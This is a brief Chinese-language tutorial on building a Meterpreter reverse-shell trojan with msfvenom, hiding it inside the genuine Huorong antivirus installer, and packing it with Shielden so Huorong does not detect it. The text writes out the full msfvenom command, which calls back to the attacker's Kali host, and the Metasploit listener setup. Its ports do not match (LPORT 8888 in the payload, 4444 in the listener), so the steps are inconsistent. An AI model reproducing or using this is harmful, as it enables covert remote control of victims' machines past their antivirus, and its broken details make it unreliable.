使用msfvenom免杀火绒

1、简介

本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件，用kali监听，靶机win11运行木马程序，实现控制靶机win11。

2、实验环境

1.一台kali虚拟机ip为：192.168.4.20

2.一台windows11专业版物理机ip为：192.168.4.90

3、实验步骤

1、首先到火绒官网上下载个火绒安装包后放到kali中

2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.4.20 LPORT=8888 -x sysdiag-full-5.0.74.2-2023.11.07.1.exe -f exe -o shell.exe

生成到桌面下

3、把刚刚生成的exe木马文件传输到我们的win11物理机上

前提把杀软关闭要不然会杀掉，没有做免杀的木马

4、使用Safengin工具调试，生成。

工具网址：永久免费的软件加密方案：Shielden - 『逆向资源区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

5、在kali上输入msfconsole打开metasploit

6、metasploit配置及监听

use exploit/multi/handler #加载模块

set lhost 192.168.4.20 #设置kali的IP地址为监听地址

set payload windows/meterpreter/reverse_tcp #修改成我们之前生成木马时使用的payload

set lport 4444 #设置监听端口

run#开始监听

监听好后我们就可以用win11靶机，打开火绒点击我们没有编译过的木马程序直接被火绒给杀了

而没有编译的木马直切被火绒给杀了

再点击我们编译过的木马后就连接上我们的kali攻击机了

连接后

shell#进入终端查看ip

发现乱码

使用

chcp 65001

再查看ip大部分乱码消失

后续根据自己的操作所需执行的代码，以上是cmd命令中的执行命令

实验完毕